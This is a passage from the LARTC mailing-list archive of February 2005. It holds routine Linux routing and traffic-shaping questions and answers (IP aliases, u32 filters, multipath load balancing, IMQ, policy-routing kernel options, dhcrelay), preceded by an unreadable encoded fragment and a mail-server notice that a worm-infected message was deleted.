1Nk8O9RMAHbPl7CAqA5D6vNw6A9q8ZgOx834Or1xz3f5qztOAd9lKL1UPI3gtmwEF3a+I9IC PPhHCB/rneQJedOnATlSRs/AWZgDDNvBj2mZNvrsiM2rXW+XdvODeg3jkWAmy23k2G5l7yX9 hZFaVJ5ECHkkO0lLywO0oEAivtyB6S5aNJ0bVaeNy/pI9GWjzPgPqntAF4E7DZWwplVqP7HO up5xIVCkIneFSNwt+EBwK2qxNOW2s9VHfbl/mUEldFlIaCEBaNqYfHw+Lj3n5w6nL2d0S8A7 AnC1+2+l+TQoN3VySU/mgOxrRNa0M8Zs32wZzVbLAaFX+aODnAcTuyq3FAq1Jq/LsdSYFqHG GcshSH01wCh30WG79XAZorpWhoqJhHO7tq99WNfHOwPHpkIBmFXmZGJCZ3lZtLNlzG+4Bd2E gaVdAwuKV8gxRZpg+WOOuOiB1bDxFelam2rn1gW3LUd3YTsCo9KlTCTVhr2Qud7WH4ka7h4U xnh46abQGq+Kz7yHNR/HQlqfKWfFvyEScUmm2mVBBXw4pESmUMPFaYYxFFv3d7pEoM43LIBt GNH50H9P5i9tyZMhRtHtLQHvv+TFZG//IAaaBISGludHuw29VC+QxqzZnpFbJ0+OY10EdC6P YUJeHWwLBe0DWvKtp2FXFsVvVgJeoIYcYwERzkC6kDQzVr6WsWPsU/jZwBmLGXkzvImHnHs3 9BjE2rFrymQmYv8W/wepkQ0wP/or3Adtwf9HgwEtYWkEQdxZzwlBudJ/BD+gvFanddX+3nHG aVj4FRs2Wt8hsriwn6d5ol0Usp74UyPIVbUzPOMx20hEWNYXsUAyPNHeXCrKDWNAL2FndEzp pMQzt3aJS1U46gg6BtjItf9pkisBWGjk+EKxAM4mMBKO88bQPZf+jbE8wog3jX1JYtVIEwvy 
From techsupport@sqliaison.com Fri Feb 4 12:50:34 2005
From: techsupport@sqliaison.com (techsupport@sqliaison.com)
Date: Fri, 4 Feb 2005 07:50:34 -0500
Subject: [LARTC] SQLiaison E-Mail Virus Alert
Message-ID: <000001c50ab8$1e4f4960$50f7cdcd@sqliaison.com>

SQLiaison Mail Server: GroupShield™ Alert

The email server has discovered a problem with the following email.

Please note that the sender of the email will not be notified with this message.

> More information :

Date/Time sent: 04 Feb 2005 07:50:33
Subject line: [LARTC] Fwd: Warning again
From: lartc-admin@mailman.ds9a.nl
To: lartc@mailman.ds9a.nl
Action taken: Deleted
Virus Found: W32/Netsky.p@MM!zip
Reason: Anti-Virus
Rule Group:

For additional information, please contact SQLiaison Support Team

techsupport@sqliaison.com

From George Alexandru Dragoi Fri Feb 4 13:27:14 2005
From: George Alexandru Dragoi (George Alexandru Dragoi)
Date: Fri, 4 Feb 2005 15:27:14 +0200
Subject: [LARTC] routable subnet as aliased IP's?
In-Reply-To: <1107508803.42033e435a792@mail.norwesters.org>
References: <1107508803.42033e435a792@mail.norwesters.org>
Message-ID: <3063e50502040527378be5d5@mail.gmail.com>

I think you can just make aliases for all 8 ips (Yes i said 8)

ifconfig eth0:0 100.0.43.152 netmask 255.255.255.255 up
ifconfig eth0:1 100.0.43.153 netmask 255.255.255.255 up
ifconfig eth0:2 100.0.43.154 netmask 255.255.255.255 up
...
ifconfig eth0:7 100.0.43.159 netmask 255.255.255.255 up

On Fri, 4 Feb 2005 01:20:03 -0800, 3ds@norwesters.net <3ds@norwesters.net> wrote:
> Greetings all!
> I just got a colocated server space and the ISP has given me an IP address and a
> routable /29 subnet. Here's a partial snippet of the info they gave me (with
> the real addresses changed for privacy)
>
> ==== WAN Address
> Customer IP Address : 100.0.33.14
> Netmask : 255.255.255.248
> Broadcast Address : 100.0.33.15
> Default Gateway : 100.0.33.9
> ==== Routed Network
> IP Address Type : 100.0.43.152/29 Class-C Subnet
> Number of IP Addrs : 6
> Domain Name : example.net
> Customer IP Addresses : 100.0.43.{153 thru 158}
> Netmask : 255.255.255.248
> Broadcast Address : 100.0.43.159
>
> And they provided this chart:
>                                                 -
>                                                 |
>                                                 |      +----------+
>                                                 |      | Customer |
>                                                 |------| Host #1  |
>                                                 | .154 |          |
>                                                 |      +----------+
>            - WAN -                  - Subnet -  |
> +------+   Net/Mask   +----------+   Net/Mask   |      +----------+
> | ISP  |  100.0.33.8  | Customer | 100.0.43.152 |      | Customer |
> |Router|---- /29 -----|Colocation|---- /248 ----|------| Host #2  |
> |      | .9       .14 |  Router  | .153         | .155 |          |
> +------+              +----------+              |      +----------+
>                      ** REQUIRED **             |
>                      **  DEVICE  **             |      +----------+
>                                                 |      | Customer |
>                                                 |------| Host #n  |
>                                                 | .156 |          |
>                                                 |      +----------+
>                                                 |
>                                                 -
>
> I have a single server with Fedora Core3 (x86-64 2.6.10-1 kernel) installed, and
> my intent is to use the iproute2 tools to set up aliases for .154, .155, .156,
> etc. and then use IP Virtual Hosts in Apache.
>
> So, to my question. I could get a router for routing the /29 subnet as the ISP
> suggests, but can I use my Linux machine to do this? Can I mount eth0 as
> 100.0.33.14 and then setup the 100.0.43.152-158 as aliases and write the routing
> so that everything works? I have read chapters 3 and 4 of the LARTC, and I
> think it may be possible, but it's just not clicking yet as to how I might be
> able to do this.
>
> And to add one last twist to this... let's say that I can do the above, what if
> I wanted to take one of those IP's from the /29 subnet and route it on to
> another system plugged into my eth1 while maintaining all of the other IP's as
> aliases?
>
> Am I dreaming? Can you help me?
>
> Thanks!
> Ray
>
> _______________________________________________
> LARTC mailing list / LARTC@mailman.ds9a.nl
> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>

--
Bla bla

From j.luebbert@kaladix.org Fri Feb 4 18:29:59 2005
From: j.luebbert@kaladix.org (Jörg Lübbert)
Date: Fri, 04 Feb 2005 19:29:59 +0100
Subject: [LARTC] U32 port matching trouble
Message-ID: <4203BF27.1070007@kaladix.org>

Hello,

I'm having some trouble with the u32 port match and that is when specifying a mask.

tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 27015 0xffff flowid 2:4

Using 27015 0xffff works just fine, all packets to dport 27015 go to 2:4

tc filter add prio 1 dev ppp2 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 27015 0xFFD2 flowid 2:4

Using 27015 0xffd2, no packets go to 2:4.
What should happen if my theory below is right is putting ports 27015 - 27050 in 2:4

The way I calculate the mask is:
- Convert lowest boundary of port range to binary (27015)
- Convert highest boundary of port range to binary (27050)
- XOR every bit of the low port with the negated bit of the high port
- Convert calculated value to base 16 and use as 0x$MASK

So basically I assume that:
[ ] I have no idea how the mask field works
[ ] There is an error in the implementation

Can anyone confirm my understanding of the mask calculation?
Can anyone confirm an error in the implementation?

I'm running iproute2-ss050112 on a 2.4.28 kernel (with several patches)

From Bernardo Silveira Fri Feb 4 19:01:25 2005
From: Bernardo Silveira (Bernardo Silveira)
Date: Fri, 4 Feb 2005 17:01:25 -0200
Subject: [LARTC] Multiple gateways setup and timeout connections
Message-ID: <28dab43f05020411011c0906c@mail.gmail.com>

Hi,

I've setup a gateway using multiple default gateways and netfilter MASQUERADE to load balance traffic between two DSL interfaces and one dedicated link, and when I try to download something big, or when I'm using MSN (both in clients under this gateway), sometimes, or most times, after a while the connection timeouts. The connection doesn't seem to change its gateway (verified using ip route list cache). I've seen a message complaining about a similar problem but it didn't have any solution. Maybe somebody has something new now.
Here goes the script I use:

#!/bin/bash
ip1="192.x.x.1"
gw1="192.x.x.254"
ip2="192.x.y.1"
gw2="192.x.y.254"
ip3="200.w.z.141"
gw3="200.w.z.129"

# Setup source IP routing rules
# ADSL1
ip rule add from $ip1 lookup 1
ip route add 192.168.8.0/24 via 192.168.8.1 table 1
ip route add 192.168.3.0/24 via 192.168.3.1 table 1
ip route add 0/0 via $gw1 table 1

# ADSL2
ip rule add from $ip2 lookup 2
ip route add 192.168.8.0/24 via 192.168.8.1 table 2
ip route add 192.168.3.0/24 via 192.168.3.1 table 2
ip route add 0/0 via $gw2 table 2

# ADSL3
ip rule add from $ip3 lookup 3
ip route add 192.168.8.0/24 via 192.168.8.1 table 3
ip route add 192.168.3.0/24 via 192.168.3.1 table 3
ip route add 0/0 via $gw3 table 3

# Setup load balancing
ip route add default equalize scope global \
    nexthop via $gw1 dev eth1 \
    nexthop via $gw2 dev eth2 \
    nexthop via $gw3 dev eth3

# Pass Internet traffic to internal network unmodified
iptables -t nat -A POSTROUTING -o eth0 -j ACCEPT

# Masquerading outbound connections from internal network
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -t nat -A POSTROUTING -o eth2 -j MASQUERADE
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE
#iptables -t nat -A POSTROUTING -s 192.168.8.0/24 -j MASQUERADE
#iptables -t nat -A POSTROUTING -s 192.168.3.0/24 -j MASQUERADE

Here goes the route garbage collector configuration:

net.ipv4.neigh.eth3.gc_stale_time = 60
net.ipv4.neigh.eth2.gc_stale_time = 60
net.ipv4.neigh.eth1.gc_stale_time = 60
net.ipv4.neigh.eth0.gc_stale_time = 60
net.ipv4.neigh.lo.gc_stale_time = 60
net.ipv4.neigh.default.gc_thresh3 = 1024
net.ipv4.neigh.default.gc_thresh2 = 512
net.ipv4.neigh.default.gc_thresh1 = 128
net.ipv4.neigh.default.gc_interval = 30
net.ipv4.neigh.default.gc_stale_time = 60
net.ipv4.inet_peer_gc_maxtime = 120
net.ipv4.inet_peer_gc_mintime = 10
net.ipv4.route.gc_elasticity = 1
net.ipv4.route.gc_interval = 1
net.ipv4.route.gc_timeout = 0
net.ipv4.route.gc_min_interval = 0
net.ipv4.route.gc_thresh = 2048

The tcpdump traffic goes like this:

From the gateway:

19:08:37.404963 praia1.praiacamboriu.com.br.ftp-data > 141.porttal.com.br.1412: . 11025485:11026945(1460) ack 1 win 58400 (DF)
19:08:37.432250 141.porttal.com.br.1412 > praia1.praiacamboriu.com.br.ftp-data: . ack 11028405 win 8760 (DF)
19:08:37.521619 praia1.praiacamboriu.com.br.ftp-data > 141.porttal.com.br.1412: . 11029865:11031325(1460) ack 1 win 58400 (DF)
19:08:37.527411 praia1.praiacamboriu.com.br.ftp-data > 141.porttal.com.br.1412: . 11028405:11029865(1460) ack 1 win 58400 (DF)
19:08:38.533879 192.168.200.1.1432 > praia1.praiacamboriu.com.br.ftp-data: . ack 4381 win 8760 (DF)
19:08:46.182282 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: . ack 4615497 win 0 (DF)
19:08:51.182479 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: . ack 4615497 win 0 (DF)
19:08:53.664901 praia1.praiacamboriu.com.br.ftp-data > 141.porttal.com.br.1412: . 11028405:11029865(1460) ack 1 win 58400 (DF)
19:08:56.185343 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: . ack 4615497 win 0 (DF)
19:09:01.507109 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: . ack 4615497 win 0 (DF)
19:09:16.253324 192.168.200.1.1432 > praia1.praiacamboriu.com.br.ftp-data: . ack 24821 win 0 (DF)
19:09:23.789876 141.porttal.com.br.1412 > praia1.praiacamboriu.com.br.ftp-data: R 19400787:19400787(0) win 0 (DF)
19:09:23.833381 192.168.200.1.1430 > praia1.praiacamboriu.com.br.ftp-data: R 20687684:20687684(0) win 0 (DF)
19:09:23.834135 192.168.200.1.1432 > praia1.praiacamboriu.com.br.ftp-data: R 20857536:20857536(0) win 0 (DF)
19:09:26.254170 192.168.200.1.1432 > praia1.praiacamboriu.com.br.ftp-data: R 20857536:20857536(0) win 0

And from the ftp which I was downloading:

15:37:44.490583 praia1.praiacamboriu.com.br.ftp-data > 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254: . ack 1 win 57920 (DF)
15:37:44.493251 praia1.praiacamboriu.com.br.ftp-data > 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254: P 1:1018(1017) ack 1 win 57920 (DF)
15:37:44.670579 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254 > praia1.praiacamboriu.com.br.ftp-data: . ack 1018 win 64518 (DF)
15:37:44.670668 praia1.praiacamboriu.com.br.ftp-data > 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254: FP 1018:2389(1371) ack 1 win 57920 (DF)
15:37:44.738904 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254 > praia1.praiacamboriu.com.br.ftp-data: . ack 2390 win 65535 (DF)
15:37:44.744887 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254 > praia1.praiacamboriu.com.br.ftp-data: F 1:1(0) ack 2390 win 65535 (DF)
15:37:44.744918 praia1.praiacamboriu.com.br.ftp-data > 201-002-197-003.jvece7001.e.brasiltelecom.net.br.11254: . ack 2 win 57920 (DF)

Thanks,
Bernardo Silveira
Via IP Soluções para Internet Ltda.

From j.luebbert@kaladix.org Fri Feb 4 21:15:30 2005
From: j.luebbert@kaladix.org (Jörg Lübbert)
Date: Fri, 04 Feb 2005 22:15:30 +0100
Subject: [LARTC] U32 port matching trouble
In-Reply-To: <20050204195956.81019.qmail@web60301.mail.yahoo.com>
References: <20050204195956.81019.qmail@web60301.mail.yahoo.com>
Message-ID: <4203E5F2.6000004@kaladix.org>

Walter Karshat wrote:
> A filter specification of
> 'match ip dport 0x6980 0xFFC0'
> will match a range of 27008 (0x6980) to 27071
> (0x69BF).

Just like I thought... Unfortunately this does not work for me :-(

tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 0x6987 0xFFD2 flowid 2:4

Whereas this works:

tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 0x6987 0xFFFF flowid 2:4
tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 0x6988 0xFFFF flowid 2:4
.
.
.
tc filter add prio 1 dev ppp1 parent 2:0 protocol ip u32 match ip dst 0.0.0.0/0 match ip protocol 17 0xff match ip dport 0x69AA 0xFFFF flowid 2:4

But most likely comes at the cost of huge overhead.

> Are you certain you need to go all the way to 27050
> with your Half-Life server?

Yes, because there are enough internet servers not running within the standard range of 27015 - 27020 but up to 40 or 50 (and of course some non standard ports that I cannot take care of).

Thanks again,
- Jörg

From andy.furniss@dsl.pipex.com Sat Feb 5 12:30:40 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sat, 05 Feb 2005 12:30:40 +0000
Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table.
In-Reply-To: <200502011237.24386.rio@martin.mu>
References: <200501191657.15767.rio@martin.mu> <200501291829.44294.rio@martin.mu> <41FEBC7A.5030405@dsl.pipex.com> <200502011237.24386.rio@martin.mu>
Message-ID: <4204BC70.5030005@dsl.pipex.com>

Rio Martin. wrote:
> On Monday 31 January 2005 23:17, Andy Furniss wrote:
>
>>Ahh - I thought that squid could limit connections based on the rate the
>>client could sustain.
>>You can shape incoming to squid with imq if hooked after nat, because
>>its traffic will have real dst address - other will have been denatted.
>
>
> Could you give me some example, how to do that?
> Thanks ..
>

There may be a way to do this with a dummy device soon, but for now you need to patch kernel with imq from http://www.linuximq.net choose to hook after nat (may be default - the first letter in imq kernel config needs to be A)

Set up htb with your rules for sharing/prioritising interactive traffic attached to imq0.

In prerouting mangle you can do some marking eg. small tcp/udp to get priority.
Then append a rule like this -

iptables -t mangle -A PREROUTING -i eth0 -j IMQ --todev 0

Somewhere in your htb setup make a class for your squid traffic and filter traffic to it something like -

tc class add dev imq0 parent 1:2 classid 1:33 htb rate 220kbit ceil 480kbit quantum 1500 prio 1

tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 \
    match ip dst 220.1.1.1 flowid 1:33

You also need to first modprobe imq if it's a module and bring it up with -

modprobe imq numdevs=1
ip link set imq0 up

Andy.

From dan@coverfire.com Sat Feb 5 14:15:40 2005
From: dan@coverfire.com (Dan Siemon)
Date: Sat, 05 Feb 2005 09:15:40 -0500
Subject: [LARTC] ANNOUNCE: LQL# 0.8.0 and LQL 0.8.0
Message-ID: <1107612940.4707.30.camel@ganymede>

******
* Since LARTC is not an announcement list I will not be posting
* all release announcements here. LQL has been through several
* releases since the initial announcement and LQL-Sharp is
* something completely new which will hopefully be of interest to
* many of the people subscribed to LARTC.
******

That's right! Yes, yes, yes. You can now control the QoS features of the Linux kernel from a high level language. LQL-Sharp provides a Mono (C#) binding to all of the methods in the LQL library.

To show just how easy LQL-Sharp makes manipulating the Linux QoS features I threw together a small demo GUI application last night. Check it out.
http://www.coverfire.com/archives/2005/02/04/lql-htb-widget/

What's that? You don't like C#? Well you can use LQL-Sharp with any language supported by Mono.

I don't like Mono you say? Well that's OK too. All QoS elements in LQL are implemented as GObjects [1]. This means it is easy to create language bindings to just about any language you like. Native Python bindings should not take more than a couple of days. I would be happy to offer help to anyone wishing to pursue bindings to their favourite language.

---------------------------
- LQL-Sharp 0.8.0 (http://www.coverfire.com/lql-sharp/)
---------------------------
LQL-Sharp provides Mono (C#) bindings to the LQL library.

0.8.0:
* First public release.
* Supports all of the features in LQL 0.8.0.

---------------------------
- LQL 0.8.0 (http://www.coverfire.com/lql/)
---------------------------
The Linux QoS Library (LQL) provides a GPL licensed, GObject based C API to manipulate the network queueing disciplines, classes and classifiers in the Linux kernel. LQL does not use the TC command as a back-end. Instead, LQL communicates with the Linux kernel via Netlink sockets the same way TC does.

0.8.0:
* API changes to accommodate the Mono (C#) bindings.
* Make "mark" a proper property of LQLClassifierFWMark.
* Documentation for the TCIndex methods.

[1] - http://developer.gnome.org/doc/API/2.0/gobject/index.html

--
OpenPGP key: http://www.coverfire.com/files/pubkey.txt
Key fingerprint: FB0A 2D8A A1E9 11B6 6CA3 0C53 742A 9EA8 891C BD98

From rootlinux@yahoo.com Sat Feb 5 14:44:41 2005
From: rootlinux@yahoo.com (root linux)
Date: Sat, 5 Feb 2005 06:44:41 -0800 (PST)
Subject: [LARTC] How to route certain ports to other link
Message-ID: <20050205144442.723.qmail@web30504.mail.mud.yahoo.com>

Hi,

I have one satellite link and one sdsl link. And, one LAN link. My load balancing is working great with a iptables's masquerading (no fw rules).

Now, I need to route the following ports to my sdsl link:
- 20, 21, 22, 25, 80, 110, 143, and 443

Whereas the others go to my satellite link.

Has anyone done this before?

Regards,
rootlinux

From pankaj@toughguy.net Sat Feb 5 15:28:20 2005
From: pankaj@toughguy.net (Pankaj Agarwal)
Date: Sat, 5 Feb 2005 20:58:20 +0530
Subject: [LARTC] Help - Getting an error when trying to add prio to tables....
Message-ID: <003c01c50b97$62f77940$8d00150a@dreammac>

Hi,

I am getting the errors given below, when I am trying to add the prio to any table. What can be the problem and how can i resolve it.... Kindly help

[root /root]# ip rule
RTNETLINK answers: Invalid argument
Dump terminated

[root /root]# ip rule list
RTNETLINK answers: Invalid argument
Dump terminated

[root /root]# ip rule list table main
"ip rule show" need not eny arguments.

[root /root]# ip rule show
RTNETLINK answers: Invalid argument
Dump terminated

[root /root]# ip rule add prio 50 table main
RTNETLINK answers: Invalid argument

[root /root]# ip route
192.168.2.5 dev eth1 scope link
61.11.104.63 dev eth0 scope link
220.227.153.48/28 dev eth2 proto kernel scope link src 220.227.153.61
192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.5
61.11.104.0/24 dev eth0 proto kernel scope link src 61.11.104.63
127.0.0.0/8 dev lo scope link
default via 61.11.104.1 dev eth0

[root /root]# ip
Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }
where OBJECT := { link | addr | route | rule | neigh | tunnel |
 maddr | mroute | monitor }
OPTIONS := { -V[ersion] | -s[tatistics] | -r[esolve] |
-f[amily] { inet | inet6 | ipx | dnet | link }
| -o[neline] }

Thanks and Regards,

Pankaj Agarwal

From snitt@urbnet.hu Sat Feb 5 17:09:39 2005
From: snitt@urbnet.hu (Endre SZABO)
Date: Sat, 5 Feb 2005 18:09:39 +0100 (CET)
Subject: [LARTC] Help - Getting an error when trying to add prio to tables....
In-Reply-To: <003c01c50b97$62f77940$8d00150a@dreammac>
References: <003c01c50b97$62f77940$8d00150a@dreammac>
Message-ID:

compile a kernel with the required options checked first, like:

CONFIG_IP_ROUTE_MULTIPATH=y
CONFIG_IP_MULTIPLE_TABLES=y
CONFIG_IP_ADVANCED_ROUTER=y

but i'm not sure if these are the required ones.

73, Snitt

.-- In reply to Pankaj Agarwal's letter:

|Hi,
|
|I am getting the errors given below, when I am trying to add the prio to any
|table. What can be the problem and how can i resolve it.... Kindly help
|
|[root /root]# ip rule
|RTNETLINK answers: Invalid argument
|Dump terminated
|
|[root /root]# ip rule list
|RTNETLINK answers: Invalid argument
|Dump terminated
|
|[root /root]# ip rule list table main
|"ip rule show" need not eny arguments.
|
|[root /root]# ip rule show
|RTNETLINK answers: Invalid argument
|Dump terminated
|
|[root /root]# ip rule add prio 50 table main
|RTNETLINK answers: Invalid argument
|
|[root /root]# ip route
|192.168.2.5 dev eth1 scope link
|61.11.104.63 dev eth0 scope link
|220.227.153.48/28 dev eth2 proto kernel scope link src 220.227.153.61
|192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.5
|61.11.104.0/24 dev eth0 proto kernel scope link src 61.11.104.63
|127.0.0.0/8 dev lo scope link
|default via 61.11.104.1 dev eth0
|
|[root /root]# ip
|Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }
|where OBJECT := { link | addr | route | rule | neigh | tunnel |
| maddr | mroute | monitor }
|OPTIONS := { -V[ersion] | -s[tatistics] | -r[esolve] |
|-f[amily] { inet | inet6 | ipx | dnet | link }
|| -o[neline] }
|
|Thanks and Regards,
|
|Pankaj Agarwal

From pankaj@toughguy.net Sat Feb 5 17:17:55 2005
From: pankaj@toughguy.net (Pankaj Agarwal)
Date: Sat, 5 Feb 2005 22:47:55 +0530
Subject: [LARTC] Help - Getting an error when trying to add prio to tables....
References: <003c01c50b97$62f77940$8d00150a@dreammac>
Message-ID: <00a101c50ba6$a6fde160$8d00150a@dreammac>

tried these but not working...
i edited the file /usr/src/linux/.config

CONFIG_IP_ADVANCED_ROUTER=y
CONFIG_IP_MULTIPLE_TABLES=y
CONFIG_IP_ROUTE_FWMARK=y
CONFIG_IP_ROUTE_NAT=y
CONFIG_IP_ROUTE_MULTIPATH=y
CONFIG_IP_ROUTE_TOS=y
CONFIG_IP_ROUTE_VERBOSE=y
CONFIG_IP_ROUTE_LARGE_TABLES=y

looking for your help

----- Original Message -----
From: "Endre SZABO"
To: "Pankaj Agarwal"
Cc:
Sent: Saturday, February 05, 2005 10:39 PM
Subject: Re: [LARTC] Help - Getting an error when trying to add prio to tables....

> compile a kernel with the required options checked first, like:
>
> CONFIG_IP_ROUTE_MULTIPATH=y
> CONFIG_IP_MULTIPLE_TABLES=y
> CONFIG_IP_ADVANCED_ROUTER=y
>
> but i'm not sure if these are the required ones.
>
> 73, Snitt
>
> .-- Valaszul Pankaj Agarwal levelere:
>
> |Hi,
> |
> |I am getting the errors given below, when I am trying to add the prio to
> any
> |table. What can be the problem and how can i resolve it.... Kindly help
> |
> |[root /root]# ip rule
> |RTNETLINK answers: Invalid argument
> |Dump terminated
> |
> |[root /root]# ip rule list
> |RTNETLINK answers: Invalid argument
> |Dump terminated
> |
> |[root /root]# ip rule list table main
> |"ip rule show" need not eny arguments.
> |
> |[root /root]# ip rule show
> |RTNETLINK answers: Invalid argument
> |Dump terminated
> |
> |[root /root]# ip rule add prio 50 table main
> |RTNETLINK answers: Invalid argument
> |
> |[root /root]# ip route
> |192.168.2.5 dev eth1 scope link
> |61.11.104.63 dev eth0 scope link
> |220.227.153.48/28 dev eth2 proto kernel scope link src 220.227.153.61
> |192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.5
> |61.11.104.0/24 dev eth0 proto kernel scope link src 61.11.104.63
> |127.0.0.0/8 dev lo scope link
> |default via 61.11.104.1 dev eth0
> |
> |[root /root]# ip
> |Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }
> |where OBJECT := { link | addr | route | rule | neigh | tunnel |
> | maddr | mroute | monitor }
> |OPTIONS := { -V[ersion] | -s[tatistics] | -r[esolve] |
> |-f[amily] { inet | inet6 | ipx | dnet | link }
> || -o[neline] }
> |
> |Thanks and Regards,
> |
> |Pankaj Agarwal

From snitt@urbnet.hu Sat Feb 5 17:29:43 2005
From: snitt@urbnet.hu (Endre SZABO)
Date: Sat, 5 Feb 2005 18:29:43 +0100 (CET)
Subject: [LARTC] Help - Getting an error when trying to add prio to tables....
In-Reply-To: <00a101c50ba6$a6fde160$8d00150a@dreammac>
References: <003c01c50b97$62f77940$8d00150a@dreammac> <00a101c50ba6$a6fde160$8d00150a@dreammac>
Message-ID:

ok, to let policy routing work, you will have to have these options checked in menuconfig afaik:

Networking options --->
[*] TCP/IP networking
[*] IP: multicasting
[*] IP: advanced router
[*] IP: policy routing

2.4 kernel documentation refers to http://www.compendium.com.ar/policy-routing.txt which contains the following:

2. Required software.

You'll need a recent 2.1.x kernel (i've a pair of production machines running 2.1.119 from some weeks ago and my work devel machine runs 2.1.129) compiled with policy routing.
(depends on Networking Options/ IP: advanced router)

.-- In reply to Pankaj Agarwal's letter:

|tried these but not working... i edited the file /usr/src/linux/.config
|
|CONFIG_IP_ADVANCED_ROUTER=y
|CONFIG_IP_MULTIPLE_TABLES=y
|CONFIG_IP_ROUTE_FWMARK=y
|CONFIG_IP_ROUTE_NAT=y
|CONFIG_IP_ROUTE_MULTIPATH=y
|CONFIG_IP_ROUTE_TOS=y
|CONFIG_IP_ROUTE_VERBOSE=y
|CONFIG_IP_ROUTE_LARGE_TABLES=y
|
|looking for your help
|
|
|----- Original Message ----- From: "Endre SZABO"
|To: "Pankaj Agarwal"
|Cc:
|Sent: Saturday, February 05, 2005 10:39 PM
|Subject: Re: [LARTC] Help - Getting an error when trying to add prio to
|tables....
|
|
|> compile a kernel with the required options checked first, like:
|>
|> CONFIG_IP_ROUTE_MULTIPATH=y
|> CONFIG_IP_MULTIPLE_TABLES=y
|> CONFIG_IP_ADVANCED_ROUTER=y
|>
|> but i'm not sure if these are the required ones.
|>
|> 73, Snitt

From lars@lhanke.de Sun Feb 6 09:19:47 2005
From: lars@lhanke.de (Dr. Lars Hanke)
Date: Sun, 6 Feb 2005 10:19:47 +0100
Subject: [LARTC] dhcrelay on router
Message-ID: <200502061019.47802.lars@lhanke.de>

Hi,

I'm setting up a router (linux, debian-sarge), which shall relay dhcp requests from all subnets to a central DHCP server. The general stuff is solved, i.e. I can ping from any connected machine to any other including the NICs of the router itself. All firewall tables (including nat and mangle) are set to ACCEPT and flushed.

On my model system I have the NIC 172.16.1.121 (eth1), which is surtur and also connects to adept the DHCP (172.16.1.7). This net (172.16.1.0) shall be connected to 172.16.2.0 using the other NIC 172.16.2.1 (eth0, not in DNS). Attached to it is my WLAN access point (ymir, 172.16.2.12).
And this is what happens:

#> dhcrelay -i eth0 adept.mgr
#> tcpdump -i any port bootpc or port bootps
09:42:09.996479 172.16.1.12.bootpc > 255.255.255.255.bootps: xid:0x960f0000 flags:0x8000 [|bootp]
09:42:09.997009 surtur.mgr.bootps > adept.mgr.bootps: (request) xid:0x960f0000 flags:0x8000 G:172.16.2.1 ether 0:9:5b:68:19:fb [|bootp] (DF)
09:42:09.997603 adept.mgr.bootps > 172.16.2.1.bootps: (reply) xid:0x960f0000 flags:0x8000 Y:ymir.mgr S:adept.mgr G:172.16.2.1 ether 0:9:5b:68:19:fb [|bootp] (DF)

... but something like the following never appears (line taken from DHCP exchange from server installed on router):

09:59:38.780364 172.16.2.1.bootps > 255.255.255.255.bootpc: xid:0x960f0000 flags:0x8000 Y:ymir.mgr S:172.16.2.1 [|bootp] [tos 0x10]

Therefore, ymir never gets his IP!

Any help appreciated,
- lars.

From J.Kraaijeveld@Askesis.nl Sun Feb 6 11:01:00 2005
From: J.Kraaijeveld@Askesis.nl (Joost Kraaijeveld)
Date: Sun, 6 Feb 2005 12:01:00 +0100
Subject: [LARTC] Bridging lan over wireless link
Message-ID:

Hi all,

I want to create a bridge (see picture below) between 2 LANs with the same IP range (192.168.0.0/24) using 2 wireless links that use load sharing over multiple interfaces (as described here: http://lartc.org/howto/lartc.loadshare.html) for load balancing and fault tolerance. Both links should use IPsec for encryption.

I have googled for an example that does this but I could not find it.

Is this possible? Not in theory but in practice: has anyone done this? If so, can anyone give me an example/pointer to an example of how to do this?

                         ________     ________
                        |        |   |        |
                        | ant1.1 |---| ant2.1 |
                        |________|   |________|
             _________       |            |        _________
            |         |-eth1-+            +--eth1-|         |
lan1 --eth0-| bridge1 |                           | bridge2 |-eth0--lan2
            |_________|-eth2-+            +--eth2-|_________|
                         ____|___     ____|___
                        |        |   |        |
                        | ant1.2 |---| ant2.2 |
                        |________|   |________|

Regards,
Joost Kraaijeveld
Askesis B.V.
Molukkenstraat 14
6524NB Nijmegen
tel: 024-3888063 / 06-51855277
fax: 024-3608416
e-mail: J.Kraaijeveld@Askesis.nl
web: www.askesis.nl

From pablo@pablodanielrey.com.ar Sun Feb 6 12:13:30 2005
From: pablo@pablodanielrey.com.ar (pablo@pablodanielrey.com.ar)
Date: Sun, 6 Feb 2005 12:13:30 +0000
Subject: [LARTC] problems with u32 fiter
Message-ID: <200502061213.30560.listas@pablodanielrey.com.ar>

hello to all
i'm trying to set a filter but doesn't want to work.
i've set up the qdiscs and the classes like this :

tc qdisc add dev ppp0 root handle 1: htb default 20
tc class add dev ppp0 parent 1: classid 1:1 htb rate 120kbit
tc class add dev ppp0 parent 1:1 classid 1:20 htb rate 30kbit ceil 120kbit
